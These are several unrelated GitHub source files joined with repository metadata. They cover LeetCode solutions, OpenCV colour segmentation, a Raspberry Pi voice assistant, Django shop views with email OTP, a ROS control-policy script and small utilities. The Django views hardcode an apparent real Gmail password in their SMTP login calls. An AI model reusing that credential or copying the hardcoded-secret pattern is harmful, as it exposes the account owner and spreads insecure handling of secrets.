class Node: def __init__(self,val): self.val = val self.next = None class MyLinkedList: def __init__(self): self.dummy = Node(-1) def get(self, index: int) -> int: count = 0 current = self.dummy.next while current and count != index: current = current.next count += 1 if not current: return -1 return current.val def addAtHead(self, val: int) -> None: node = Node(val) node.next = self.dummy.next self.dummy.next = node def addAtTail(self, val: int) -> None: node = Node(val) current = self.dummy while current.next != None: current = current.next current.next = node def addAtIndex(self, index: int, val: int) -> None: node = Node(val) current = self.dummy count = 0 while current and count != index: current = current.next count += 1 if current: node.next = current.next current.next = node def deleteAtIndex(self, index: int) -> None: current = self.dummy count = 0 while current and count != index: current = current.next count += 1 if current and current.next: current.next = current.next.next # Your MyLinkedList object will be instantiated and called as such: # obj = MyLinkedList() # param_1 = obj.get(index) # obj.addAtHead(val) # obj.addAtTail(val) # obj.addAtIndex(index,val) # obj.deleteAtIndex(index)
yonaSisay/a2sv-competitive-programming
0707-design-linked-list/0707-design-linked-list.py
0707-design-linked-list.py
py
1,616
python
en
code
0
github-code
6
7261113141
import matplotlib matplotlib.use('TkAgg') import cv2 import numpy as np import time from matplotlib import pyplot as plt def main(): #img= cv2.imread('primeiroFrame.jpg',0) img= cv2.imread('primeiroFrame.jpg',cv2.IMREAD_COLOR) print(img.shape) #nomaliza a imagem img = histogramaNormalizadoColor(img) #aplica filtro gausiano img = cv2.GaussianBlur(img,(5,5),0) #calcula os clauster usando kmeans: img = calculakmeans(img) #aplica trashholding separando as cores vermelhas mask = trashholdingVermelho(img) #aplica uma operação de closing e open na mascara para remover os ruidos retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(50,1)) openImage = cv2.morphologyEx(mask,cv2.MORPH_CLOSE,retKernel) retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(20,10)) closeImage = cv2.morphologyEx(openImage,cv2.MORPH_OPEN,retKernel) retKernel = cv2.getStructuringElement(cv2.MORPH_RECT,(5,5)) openImage = cv2.morphologyEx(closeImage,cv2.MORPH_CLOSE,retKernel) #encontra os blobs: #img_blob = deteccaoDeBlobs(openImage) #utilizando momento: img_blob = detectMomento(openImage) #cv2.imshow("Final",openImage) #cv2.imshow("CloseiImage",closeImage) #cv2.waitKey(0) #cv2.destroyAllWindows() #cap.release() def detectMomento(img): #img= cv2.imread('untitled.png',0) ret,thresh = cv2.threshold(img,125,255,0) countourn, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) countourn = list(reversed(countourn)) cnt = countourn[0] M = cv2.moments(cnt) cx = int(M["m10"]/M["m00"]) cy = int(M["m01"]/M["m00"]) print(cx) print(cy) x,y,w,h = cv2.boundingRect(countourn[0]) cv2.rectangle(img,(x-10,y-10), (x+w+10,y+h+10),(255,255,255),1) cv2.imshow("img_contours", img) cv2.waitKey(0) """ for c in countourn: M = cv2.moments(c) cx = int(M["m10"]/M["m00"]) cy = int(M["m01"]/M["m00"]) cv2.circle(img, (cX, cY), 5, (255, 255, 255), -1) cv2.imshow("img_contourn", img) print(countourn) cv2.drawContours(img, countourn, -1, (0,255,0), 3) cv2.imshow("img_contours", img) cv2.waitKey(0) """ def deteccaoDeBlobs(img): #img= cv2.imread('untitled.png',cv2.IMREAD_GRAYSCALE) params = cv2.SimpleBlobDetector_Params() #img = cv2.bitwise_not(img) params.minDistBetweenBlobs = 10 params.filterByColor = True params.blobColor = 255 params.filterByCircularity = False params.filterByConvexity = False params.filterByInertia = False params.filterByArea = True # params.minArea = 1 # params.maxArea = 100000 # # Create a detector with the parameters ver = (cv2.__version__).split('.') if int(ver[0]) < 3 : detector = cv2.SimpleBlobDetector(params) else : detector = cv2.SimpleBlobDetector_create(params) keypoints = detector.detect(img) print(type(keypoints)) keypoints = list(reversed(keypoints)) #np.invert(keypoints) for i in keypoints: im_with_keypoints = cv2.drawKeypoints(img, [i], np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS) print("################") print(i.class_id) print(i.pt) objectCentroid = i.pt print("################") break black = np.zeros((540,960,3)) #print(im_with_keypoints.size) #im_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS) cv2.imshow("Keypoints", im_with_keypoints) cv2.waitKey(0) def trashholdingVermelho(colorImage): #converte para HSV hsv = cv2.cvtColor(colorImage, cv2.COLOR_BGR2HSV) lower_red = np.array([0,70,50]) upper_red = np.array([10,255,255]) mask1 = cv2.inRange(hsv,lower_red,upper_red) lower_red = np.array([170,70,50]) upper_red = np.array([180,255,255]) mask2 = cv2.inRange(hsv,lower_red,upper_red) mask = mask1 | mask2 res = cv2.bitwise_and(colorImage,colorImage, mask = mask) #cv2.imshow('frame',colorImage) #cv2.imshow('mask',mask) #cv2.imshow('res',res) return mask def calculaHistogramaColor(colorImage): color = ('b','g','r') for i,col in enumerate(color): print("passei") histr = cv2.calcHist(colorImage,[i],None,[255],[0,255]) plt.plot(histr,color = col) plt.xlim([0,255]) plt.show() def calculaHistograma(greyImage): histr = cv2.calcHist(greyImage,[0],None,[255],[0,256]) plt.plot(histr,) plt.xlim([0,255]) def histogramaNormalizadoColor(ColorImg): lab = cv2.cvtColor(ColorImg, cv2.COLOR_BGR2LAB) lab_planes = cv2.split(lab) clahe = cv2.createCLAHE(clipLimit=2.0,tileGridSize=(8,8)) lab_planes[0] = clahe.apply(lab_planes[0]) lab = cv2.merge(lab_planes) bgr = cv2.cvtColor(lab, cv2.COLOR_LAB2BGR) return bgr #Contrast Limited Adaptive Histogram Equalization # create a CLAHE object (Arguments are optional). def histogramaNormalizadoCinza(img): clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8)) cl1 = clahe.apply(image) return cl1 def calculakmeans(img): z = img.reshape((-1,3)) z = np.float32(z) criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0) K=15 ret, label,center = cv2.kmeans(z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS) center = np.uint8(center) res = center[label.flatten()] res2= res.reshape((img.shape)) return res2 if __name__ == "__main__": main()
felipemateus/vis-oCompEstudo
histogram.py
histogram.py
py
5,685
python
en
code
0
github-code
6
37958731395
import sys from datetime import datetime class DateGenerator: def __init__(self, starting, ending, display, separator): self.__year_range = range(int(starting), int(ending)) self.__display = display self.__separator = separator self.__display_array = { '0': self.ymd, '1': self.dmy, '2': self.mdy } self.generate_date() def generate_date(self): m = range(1, 13) d = range(1, 32) for year in self.__year_range: for month in m: for day in d: self.__display_array[self.__display](year, month, day) def ymd(self, year, month, day): print(str(year) + self.__separator + "{:02d}".format(month) + self.__separator + "{:02d}".format(day)) def dmy(self, year, month, day): print(str(day) + str(month) + str(year)) def mdy(self, year, month, day): print("{:02d}".format(month) + self.__separator + "{:02d}".format(day) + self.__separator + str(year)) def main(): if len(sys.argv) == 4: DateGenerator(sys.argv[1], sys.argv[2], sys.argv[3], "") elif len(sys.argv) == 5: DateGenerator(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]) else: print( "args:\n\t1: starting year\n\t2: ending year\n\t3: display format\n\t\t0 = yyyymmdd\n\t\t1 = ddmmyyyy\n\t\t2 = mmddyyyy\n\t3: optional separator added in between") if __name__ == '__main__': main()
vjgiri/date
dateext.py
dateext.py
py
1,356
python
en
code
0
github-code
6
24535937994
# html def create_html(header, body): html = '<!DOCTYPE html>' html += '<html><head>' + header + '</head>' html += '<body>' + body + '</body>' html += '</html>' return html # link def add_ttf_font(location, name): html = '<style>' html += '@font-face {' html += 'font-family:' + name + ';' html += 'src: url(' + location + ') format(\'truetype\');' html += '}' html += '</style>' return html def add_css(location): return '<link rel="stylesheet" type="text/css" href="' + location + '"/>' def add_js(location): return '<script type="text/javascript" src="' + location + '"></script>' # svg stuff def add_title(title): return "<title>" + title + "</title>" def add_style(style_dict): style = 'style="' for k, v in style_dict.items(): style += str(k) + ':' + str(v) + '; ' style += '"' return style def create_circle(radius, cx, cy, color): html = '<circle r="' + str(radius) + '" ' html += 'cx="' + str(cx) + '" ' html += 'cy="' + str(cy) + '" ' html += 'fill="' + str(color) +'" ' html += '/>' return html def create_polygon(points_list, color): html = '<polygon ' html += 'points = "' for point in points_list: html += str(point[0]) + "," + str(point[1]) + " " html += '" ' html += 'fill="' + str(color) + '" ' html += '/>' return html def create_smash_svg_text(word, offset_x, offset_y, size, text_length, color): # add the back layer, this provides the basis for the white stroke background html = '<text ' html += 'text-anchor="start" ' html += 'x="' + str(offset_x + 1) + '" ' html += 'y="' + str(offset_y) + '" ' html += 'textLength="' + str(text_length) + 'px" ' html += 'fill="' + color + '" ' html += 'font-family="Edo, Helvetica, Arial" ' html += 'font-weight="700" ' html += 'font-size="' + str(size) + 'px" ' html += 'stroke="#ffffff" ' html += 'stroke-width="5" ' html += 'stroke-linecap="round"' html += '>' html += word html += '</text>' # add the forground, this provides the actual text in the correct color html += '<text ' html += 'text-anchor="start" ' html += 'x="' + str(offset_x) + '" ' html += 'y="' + str(offset_y) + '" ' html += 'textLength="' + str(text_length) + 'px" ' html += 'fill="' + color + '" ' html += 'font-family="Edo, Helvetica, Arial" ' html += 'font-weight="700" ' html += 'font-size="' + str(size) + 'px" ' html += '>' html += word html += '</text>' return html def create_smash_button(size_x, size_y, color, background_color = 'rgb(50, 50, 50)', word = None, float_val = None, button_type="standard", onclick=None, new_window=None, offset_up= 0, highlighted=False): outline_color = background_color shadow_color = background_color # for emphasis the shadow or outline is changed to the main color #if highlighted: # shadow_color = color if highlighted: outline_color = color html = '<svg style="' if float_val: html += 'float: ' + float_val + ';' html += 'width: ' + str(size_x + 5) + 'px;' html += 'height: ' + str(size_y + 5) + 'px;' if onclick: html += '"><g onclick="window.location.href= \'' + onclick + '\'">' elif new_window: html += '"><g onclick="window.open(\'' + new_window + '\')">' else: html += '">' # draw button if button_type == "standard": # add shadow html += create_circle(size_y / 2, size_y / 2 + 5, size_y / 2 + 5, shadow_color) html += create_polygon([(size_y/2.0 + 5,0 + 5),(size_y/2.0 + 5,size_y + 5),(size_x * 3.0/4 + 5, size_y + 5),(size_x + 5, 0 + 5)], shadow_color) # add outline html += create_circle(size_y / 2, size_y / 2, size_y / 2, outline_color) html += create_polygon([(size_y/2.0,0),(size_y/2.0,size_y),(size_x * 3.0/4, size_y),(size_x, 0)], outline_color) # add background with color html += create_circle(size_y / 2 - 5, size_y / 2, size_y / 2, color) html += create_polygon([(size_y/2.0,5),(size_y/2.0,size_y-5),(size_x * 3.0/4 - 2, size_y-5),(size_x - 12, 5)], color) # draw reverse button elif button_type == "reverse": html += create_circle(size_y / 2, size_x - (size_y / 2) + 5, size_y / 2 + 5, shadow_color) html += create_polygon([(0 + 5, size_y + 5), (size_x / 4 + 5, 0 + 5), (size_x - (size_y / 2) + 5, 0 + 5), (size_x - (size_y / 2) + 5, size_y + 5)], shadow_color) html += create_circle(size_y / 2, size_x - (size_y / 2), size_y / 2, outline_color) html += create_polygon([(0, size_y), (size_x / 4, 0), (size_x - (size_y / 2), 0), (size_x - (size_y / 2), size_y)], outline_color) html += create_circle(size_y / 2 - 5, size_x - (size_y / 2), size_y / 2, color) html += create_polygon([(12, size_y - 5), (size_x / 4 + 2, 5), (size_x - (size_y / 2) - 5, 5), (size_x - (size_y / 2) - 5, size_y - 5)], color) # draw middle type button elif button_type == "middle": html += create_polygon([(0 + 5, size_y + 5), (size_x / 4 + 5, 0 + 5), (size_x + 5, 0 + 5), (size_x * 3.0 / 4 + 5, size_y + 5)], shadow_color) html += create_polygon([(0, size_y), (size_x / 4, 0), (size_x, 0), (size_x * 3.0 / 4, size_y)], outline_color) html += create_polygon([(0 + 12, size_y - 5), (size_x / 4 + 2, 0 + 5), (size_x - 12, 0 + 5), (size_x * 3.0 / 4 - 2, size_y - 5)], color) # draw large buttons with special values elif button_type == "full": html += create_circle(size_y / 2, size_y / 2 + 5, size_y / 2 + 5, shadow_color) html += create_polygon([(size_y/2.0 + 5, 0 + 5),(size_y/2.0 + 5,size_y + 5),(size_x - size_y + 5, size_y + 5),(size_x + 5, 0 + 5)], shadow_color) html += create_circle(size_y / 2, size_y / 2, size_y / 2, outline_color) html += create_polygon([(size_y/2.0,0),(size_y/2.0,size_y),(size_x - size_y, size_y),(size_x, 0)], outline_color) html += create_circle(size_y / 2 - 5, size_y / 2, size_y / 2, color) html += create_polygon([(size_y/2.0,5),(size_y/2.0,size_y-5),(size_x - size_y - 2, size_y-5),(size_x - 12, 5)], color) # add words on the front if word: if button_type == "standard": html += create_smash_svg_text(word, (size_y / 2) - 7, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color) elif button_type == "reverse": html += create_smash_svg_text(word, size_x / 4 - 7, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color) elif button_type == "middle": html += create_smash_svg_text(word, size_x / 4 - 18, size_y - 10 - offset_up, size_y, size_x* 3.0 / 4 - 20, background_color) elif button_type == "full": html += create_smash_svg_text(word, (size_y / 2) - 7, size_y - 10 - offset_up, size_y, size_x - size_y - 20, background_color) # add the button ability if onclick: html += "</g>" html += "</svg>" return html def generate_navbar(active=None, logged_in=False): style_dict = { 'position': 'relative', 'top': 0, 'left': 0, 'margin-top': '10px', 'margin-bottom': '10px', 'margin-right': 'auto', 'margin-left': 'auto', 'min-width':'1000px', 'max-width': '1000px', 'height': '55px', } # define the highlighting for the buttons smash_highlighted = active == "home" or active == "splash" login_highlighted = active == "login" logout_highlighted = active == "logout" register_highlighted = active == "register" profile_highlighted = active == "profile" unranked_highlighted = active == "unranked" ranked_highlighted = active == "ranked" # add the navbar div html = '<div ' html += add_style(style_dict) html += '>' # add the main button html += create_smash_button(195, 50, 'rgb(255, 50, 10)', word = 'Smash', float_val='left', onclick='/', highlighted=smash_highlighted) # add the login specific buttons if not logged_in: html += create_smash_button(195, 50, 'rgb(10, 150, 50)', word = 'Register', float_val='right', button_type="reverse", onclick='/register', highlighted=register_highlighted) html += create_smash_button(195, 50, 'rgb(10, 50, 250)', word = 'Login', float_val='right', onclick='/login', highlighted=login_highlighted) else: html += create_smash_button(195, 50, '#666688', word = 'Logout', float_val='right', button_type="reverse", onclick='/logout', highlighted=logout_highlighted) html += create_smash_button(195, 50, '#93D620', word = 'Ranked', float_val='right', button_type="middle", onclick='/ranked', highlighted=ranked_highlighted) html += create_smash_button(195, 50, '#169FFA', word = 'Unranked', float_val='right', button_type="middle", onclick='/unranked', highlighted=unranked_highlighted) html += create_smash_button(195, 50, '#F2A705', word = 'Profile', float_val='right', button_type="middle", onclick='/profile', highlighted=profile_highlighted) html += '</div>' return html def generate_main_div(inner): style_dict = { 'top': 0, 'left': 0, 'position': 'relative', 'margin-top': '10px', 'margin-bottom': '10px', 'margin-left': 'auto', 'margin-right': 'auto', 'min-width':'1000px', 'max-width': '1000px', } html = '<div id="main_div"' html += add_style(style_dict) html += '>' style_dict = { 'font-family': 'Helvetica, Arial', 'font-weight':'500', 'font-size':'32px', 'top': 0, 'left': 0, 'position': 'relative', 'margin-bottom': '10px', 'margin-left': '10px', 'margin-right': '10px', } html += '<div id="text_div"' html += add_style(style_dict) html += '>' html += inner html += "</div></div>" return html class HTMLPage: header = "" body = "" def __init__(self, page_css=None): self.body = "" self.header = "" if not page_css: self.header += add_css('css/basic.css') else: self.header += add_css(page_css) self.header += add_title("Smashed") self.header += add_ttf_font('/font/edosz.ttf', 'Edo') def add_header(self, item): self.header += item def add_body(self, item): self.body += item def get_html(self): return create_html(self.header, self.body)
dpenning/Sm4shed
SmashedLobby/html_helper.py
html_helper.py
py
9,669
python
en
code
2
github-code
6
42827733659
from global_collection import * from language_collection import * from thread_collection import * from aiy.cloudspeech import CloudSpeechClient from aiy.board import Board, Led from alzheimer import * from assistant_grpc_demo import * def main(): malddomi = Malddomi() #객체 생성 thread_instance = AsyncTask() # alzheimer_instance = Alzheimer() logging.basicConfig(level=logging.DEBUG) parser = argparse.ArgumentParser(description='Assistant service example.') parser.add_argument('--language', default=locale_language()) args = parser.parse_args() logging.info('Initializing for language %s...', args.language) hints = get_hints(args.language) client = CloudSpeechClient() #알람기능 alarm = threading.Thread(target = thread_instance.thread_alarm) alarm.start() #네트워크 기능 network = threading.Thread(target = thread_instance.thread_network) network.start() # # createDB = threading.Thread(target=thread_instance.thread_date_create) # createDB.start() with Board() as board: while True: if hints: logging.info('new_test : Say something, e.g. %s.' % ', '.join(hints)) else: logging.info('new_test : Say something.') text = client.recognize(language_code=args.language, hint_phrases=hints) if text is None: logging.info('new_test : You said nothing.') continue # logging.info('new_test : You said: "%s"' % text) if '임영웅노래틀어 줘' in text: sing = threading.Thread(target=thread_instance.sing('/home/pi/Music/임영웅.mp3')) sing.start() elif '영탁노래틀어 줘' in text: sing = threading.Thread(target=thread_instance.sing('/home/pi/Music/영탁.mp3')) sing.start() elif '송가인노래틀어 줘' in text: sing = threading.Thread(target=thread_instance.sing('/home/pi/Music/송가인.mp3')) sing.start() elif '노래 꺼 줘' in text: songstop = threading.Thread(target=thread_instance.songstop) songstop.start() elif text not in hints and '노래 틀어 줘' in text: nosong = threading.Thread(target=thread_instance.sing('/home/pi/Music/nosong.mp3')) nosong.start() elif '살려 줘' in text: emergency = threading.Thread(target=thread_instance.emergency("현재 아무개씨가 위험한 상황에 빠졌습니다. 신속히 확인 부탁드리겠습니다")) emergency.start() elif '치매테스트 할게' in text: alzheimer = threading.Thread(target=thread_instance.alzheimer_test) alzheimer.start() elif '말또미' in text: malddomi.thread_assistant() elif 'goodbye' in text: break if __name__ == '__main__': main()
YuSunjo/bit_project_hyodol
raspberrypi_file/new_test.py
new_test.py
py
3,221
python
en
code
0
github-code
6
43627572834
from typing import List class Solution: def maxBoxesInWarehouse(self, boxes: List[int], warehouse: List[int]) -> int: boxes.sort() p1, p2 = 0, len(warehouse)-1 res = 0 for i in range(len(boxes)-1, -1, -1): if boxes[i] <= warehouse[p1]: p1 += 1 res += 1 elif boxes[i] <= warehouse[p2]: p2 -= 1 res += 1 if p1 > p2: break return res def test(self): test_cases = [ [[1,2,2,3,4], [3,4,1,2]], [[3,5,5,2], [2,1,3,4,5]], [[1,2,3], [1,2,3,4]], [[4,5,6], [3,3,3,3,3]], ] for boxes, warehouse in test_cases: res = self.maxBoxesInWarehouse(boxes, warehouse) print('res: %s' % res) print('-='*30 + '-') if __name__ == '__main__': Solution().test()
MichaelTQ/LeetcodePythonProject
solutions/leetcode_1551_1600/LeetCode1580_PutBoxesIntoTheWarehouseII.py
LeetCode1580_PutBoxesIntoTheWarehouseII.py
py
918
python
en
code
0
github-code
6
43785018579
from __future__ import print_function import argparse import sys import rospy import os import numpy as np from geometry_msgs.msg import Twist import time import cv2 import tensorflow as tf pre_path = os.path.abspath('../') sys.path.append(pre_path) from utils import imagezmq # ============================== Pretrained Model ========================== meta_path = './Unitedmap_0906_reload-0/RobotBrain/model-12063494.cptk.meta' ckpt_path = './Unitedmap_0906_reload-0/RobotBrain/' # ========================================================================== config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True) config.gpu_options.allow_growth = True # RL model class class RL_Model: # for testing, linear speed would be set to 0.2, while angular speed set to 0.3 or 0.4186 def __init__(self, dir, linear_speed=0.2): # ------------------------------------------------ # dir: RL model's directory # linear_speed: linear speed (x-axis) for AGV, default is 0.2 # ------------------------------------------------ tf.reset_default_graph() self.sess = tf.Session() self.saver = tf.train.import_meta_graph(path) graph = tf.get_default_graph() # get variable by name from tensorflow graph self.visual_in = graph.get_tensor_by_name('visual_observation_0:0') self.action = graph.get_tensor_by_name('action:0') self.action_mask = graph.get_tensor_by_name('action_masks:0') self.action_pub = rospy.Publisher('twitch', Twist, queue_size=1) self.linear_speed = linear_speed self.angular_speed = angular_speed self.move_command = Twist() # create mask to enable three action self.mask = np.array([[1, 1, 1]]) self.saver.restore(self.sess, tf.train.latest_checkpoint(ckpt_path)) def restore_and_run(self, img): # ---------------------------------------------------- # img_test: input image from segmentation module # ---------------------------------------------------- # initialize parameters self.move_command.angular.z = 0 self.move_command.linear.x = self.linear_speed # for multinomial sampling, using " act = tf.multinomial(self.action, 1) " and revise session in next row prob = self.sess.run([self.action], feed_dict = {self.visual_in:img, self.action_mask:self.mask}) direction = np.argmax(prob) # 3-Action # Keep moving forward if direction == 0 : self.move_command.angular.z = 0 # Turn Left elif direction == 1: self.move_command.angular.z = 1 # Turn Right elif direction == 2: self.move_command.angular.z = -1 # publish Twist self.action_pub.publish(self.move_command) # External class for RL model class PolicyModel: def __init__(self): self.RLmodel = RL_Model(meta_path) self.last_time = time.time() def callback(self,resize_image): # -------------------------------------------------- # resize_image: image received from segmentation module # -------------------------------------------------- self.RLmodel.restore_and_run(resize_image) self.last_time = time.time() # RL model's test function def test(self): for i in range(100): fake_image = np.zeros((1, 80, 120, 3)) self.RLmodel.restore_and_run(fake_image) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--port', type=str, help='connected port', dest='port', default='5555') args = parser.parse_args() rospy.init_node('control_model', anonymous=True) hub = imagezmq.ImageHub(open_port='tcp://*:%s' %(args.port)) cm = PolicyModel() while True: name, image = hub.recv_image() # recieve image start = time.time() cv2.imshow("Image", image) image = [image] cm.callback(image) # process the image print(time.time()-start) hub.send_reply() # get ready for next image cv2.waitKey(1)
KaiChen1008/Sim-to-Real-Virtual-Guidance-for-Robot-Navigation
control_policy_module/control_policy.py
control_policy.py
py
3,752
python
en
code
72
github-code
6
43356641346
#!/usr/bin/python3 from scipy import stats import numpy as np import matplotlib.pyplot as plt import sys NUM_TRIAL = 2000 def calcPlotData(numSamplings, percentiles, dist): plotXData = np.array([]) plotYData = np.array([]) for percentile in percentiles: tmpPlotXData = np.array([]) tmpPlotYData = np.array([]) for numSampling in numSamplings: scores = calcScoresAtPercentile(numSampling, percentile, dist) tmpPlotXData = np.append(tmpPlotXData, numSampling) tmpPlotYData = np.append(tmpPlotYData, np.std(scores, ddof=1)) plotXData = np.append(plotXData, tmpPlotXData) plotYData = np.append(plotYData, tmpPlotYData) return plotXData.reshape(len(percentiles), len(numSamplings)), plotYData.reshape(len(percentiles), len(numSamplings)) def calcScoresAtPercentile(numSampling, percentile, dist): scoresAtPercentile = np.array([]) for i in range(NUM_TRIAL): samples = dist.rvs(size=numSampling) scoresAtPercentile = np.append(scoresAtPercentile, stats.scoreatpercentile(samples, percentile)) return scoresAtPercentile def plot(title, plotXData, plotYData, percentiles): plt.clf() plt.figure(figsize=(15, 9)) plt.rcParams["font.size"] = 24 plt.xticks(np.arange(0, np.max(plotXData)+10, 10)) plt.grid() for i, x in enumerate(plotXData): plt.plot(x, plotYData[i], marker='o', label='percentile='+str(percentiles[i])) plt.title(title) plt.xlabel("The number of samples") plt.ylabel("Standard deviation") plt.legend() plt.savefig(title.replace(" ", "_").lower() + ".png", dpi=200) def main(): numSamplings = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100] percentiles = [1, 10, 50, 90, 99] dists = { "Uniform distribution": stats.uniform(), "Normal distribution": stats.norm(), "Exponential distribution": stats.expon() } for distName, dist in dists.items(): print("dist: {}".format(distName)) plotXData, plotYData = calcPlotData(numSamplings, percentiles, dist) print(plotYData) plot(distName, plotXData, plotYData, percentiles) if __name__ == "__main__": main()
peng225/blog
230114/percentile.py
percentile.py
py
2,211
python
en
code
0
github-code
6
30789833021
from django.contrib import messages from django.shortcuts import render import random import smtplib from.models import Onlinepayment,Offlinepayment,Onlineapproval,Offlineapproval,Send def home(request): return render(request,'f1.html') def tv(request): return render(request,'tv.html') def mobile(request): return render(request,'mobile.html') def theatre(request): return render(request,'hometheatre.html') def air(request): return render(request,'airconditioner.html') def buy(request): if request.method == 'POST': return render(request,'otpver.html') else: return render(request,'otpver.html') def offpay(request): if request.method == 'POST': return render(request, 'offlinepayment.html') else: return render(request,'offlinepayment.html') def onpay(request) : if request.method == 'POST': return render(request,'onlinepayment.html') else: return render(request,'onlinepyment.html') def onlineok(request): if request.method == 'POST': name = request.POST['name'] address = request.POST['address'] city = request.POST['city'] ph = request.POST['ph'] mail = request.POST['mail'] item = request.POST['item'] imo = request.POST['imo'] credit = request.POST['credit'] Onlineapproval(name=name, address=address, city=city, ph=ph, mail=mail, item=item, imo=imo, credit=credit).save() msg = name + ", your order has been registered you will get your product within " \ "one week. Your payment has been received. for any quiries contact-xxxx " s = smtplib.SMTP('smtp.gmail.com', 587) s.starttls() s.login("[email protected]", "Nimishakc@98") s.sendmail("[email protected]",mail, msg) s.quit() messages.success(request, 'SUCCESSFULLY ORDERED YOU WILL RECIEVE AN EMAIL SHORTLY') return render(request,'onlinepayment.html') else: messages.success(request, 'REGISTRATION FAILED TRY AGAIN LATER') return render(request,'onlinepayment.html') def offlineok(request): if request.method == 'POST': name = request.POST['name'] address = request.POST['address'] city = request.POST['city'] ph = request.POST['ph'] mail = request.POST['mail'] item = request.POST['item'] imo = request.POST['imo'] Offlineapproval(name=name, address=address, city=city, ph=ph, mail=mail, item=item, imo=imo).save() msg = name + ", your order has been registered you will get your product within " \ "one week. Your have opted offline payment system. for any quiries contact-xxxx " s = smtplib.SMTP('smtp.gmail.com', 587) s.starttls() s.login("[email protected]", "Nimishakc@98") s.sendmail("[email protected]", mail, msg) s.quit() messages.success(request, 'SUCCESSFULLY ORDERED YOU WILL RECIEVE AN EMAIL SHORTLY') return render(request,'offlinepayment.html') else: messages.success(request, 'REGISTRATION FAILED TRY AGAIN LATER') return render(request,'offlinepayment.html') def staff(request): return render(request,'staff.html') def app(request): if request.method == 'POST': username = request.POST['username'] password = request.POST['password'] if username == 'app' and password == 'app': return render(request, 'dashboard.html') else: return render(request, 'staff.html') def onappro(request): x = Onlineapproval.objects.all() return render(request, 'onlineapproval.html', {'all': x}) def offapro(request): x = Offlineapproval.objects.all() return render(request, 'offlineapproval.html', {'all': x}) def onpays(request): if request.method == 'POST': return render(request,'onlinestatus.html') else: return render(request, 'onlinestatus.html') def offpays(request): if request.method == 'POST': return render(request,'offlinestatus.html') else: return render(request, 'offlinestatus.html') val=None def send(request): if request.method == 'POST': email = request.POST['email'] x = str(random.randint(1000,9999)) c=x global val def val(): return c s = smtplib.SMTP('smtp.gmail.com', 587) s.starttls() s.login("[email protected]", "Nimishakc@98") s.sendmail("[email protected]",email, x) s.quit() messages.success(request, 'OTP SENT CHECK YOUR MAIL') return render(request,'otpver.html') else: return render(request,'otpver.html') def verify(request): if request.method == 'POST': otpcheck = request.POST['otpcheck'] ok=val() if otpcheck == ok: messages.success(request, 'LOGGED IN') return render(request,'registration.html') else: messages.success(request, 'FAILED TO VERIFY OTP') return render(request,'otpver.html') def homea(request): return render(request,'dashboard.html') def logout(request): return render(request,'staff.html')
Nimishakc/NimishaFinal
eapp/views.py
views.py
py
5,321
python
en
code
0
github-code
6
28968326311
confectionery_dict = {"торт": ["состав - мука, сахар, дрожжи, арахис, шоколад, заварной крем", "цена за 100 гр - ", 1.95, "руб", "вес - ", 3900, "гр"], "пироженое": ["состав - мука, сахар, грецкий орех, разрыхлитель", "цена за 100 гр - ", 2.05, "руб", "вес - ", 4120, "гр"], "маффин": ["состав - мука, дрожжи, сахар, фруктовый джем", "цена за 100 гр -", 1.80, "руб", "вес - ", 6100, "гр"], "желе": ["состав - желатин, фруктовый сироп", "цена за 100 гр -", 1.10, "руб", "вес - ", 1290, "гр"], "пастила": ["состав - яичный белок, сахар, загуститель", "цена за 100 гр -", 1.20, "руб", "вес -", 2120, "гр"], "пахлава": ["состав - мука, грецкий орех, арахис, мёд", "цена за 100 гр -", 1.50, "руб", " вес -", 2140, "гр"]} customer = int(input("""Наберите 1, 2, 3 или 4, если Вы хотите посмотреть описание, цену, количество или всю информацию о продукции. Наберите 5, если Вы хотите что-то приобрести :""")) try: if customer == 1: for key, value in confectionery_dict.items(): print(key, ":", value[0]) elif customer == 2: for key, value in confectionery_dict.items(): print(key, ":", value[1:4]) elif customer == 3: for key, value in confectionery_dict.items(): print(key, ":", value[4:]) elif customer == 4: for key, value in confectionery_dict.items(): print(key, ":", value) elif customer == 5: cost_of_production = 0 for key, value in confectionery_dict.items(): i = 1 while i != 0: purchase = input("Введите название продукции :").lower() number_of_products = int(input("Введите количество продукции в граммах или 0 для завершения :")) cost_of_production += float(confectionery_dict[purchase][2]) * (number_of_products / 100) remainder_of_production = int(confectionery_dict[purchase][5]) - number_of_products print(f"{purchase}: Oсталось продукции в продаже : {remainder_of_production} грамм") i = int(input("Enter 1 to continue, or 0 to complete :")) if i == 0: print(f"Стоимость приобретенной продукции равна: {cost_of_production} руб") break except KeyError: print("Нет такой продукции") finally: print("До свидания!")
vladalh/Overone-Python
exam2_5.py
exam2_5.py
py
3,354
python
ru
code
0
github-code
6
34332202564
import csv import os save_path = r"/home/riddhi/keystroke/output_numpy/dataset/" csv_file = save_path + r"genuine_user.csv" inputfileloc = save_path + r"genuine.txt" inputfile = open(inputfileloc, 'r') with open(csv_file, 'w') as csvfile: fieldnames = ['user', 'pr', 'pp', 'rp', 'rr', 'total', 'output'] csvwriter = csv.DictWriter(csvfile, fieldnames= fieldnames) csvwriter.writeheader() #csvwriter.writerow({'user':'1', 'pp':'2', 'pr':'3', 'rp':'4', 'rr':'5', 'total':'10', 'output':'1'}) #csvwriter.writerow({'user':'2', 'pp':'2', 'pr':'3', 'rp':'4', 'rr':'5', 'total':'10', 'output':'1'}) lines = [line[:-1] for line in inputfile] print(lines) for line in lines: line = line.split() print(line) csvwriter.writerow({'user':line[0], 'pp':line[1], 'pr':line[2], 'rp':line[3], 'rr':line[4], 'total':line[5], 'output':line[6]}) inputfile.close()
vishaltak/keystroke
txt2csv.py
txt2csv.py
py
859
python
en
code
1
github-code
6
32586118182
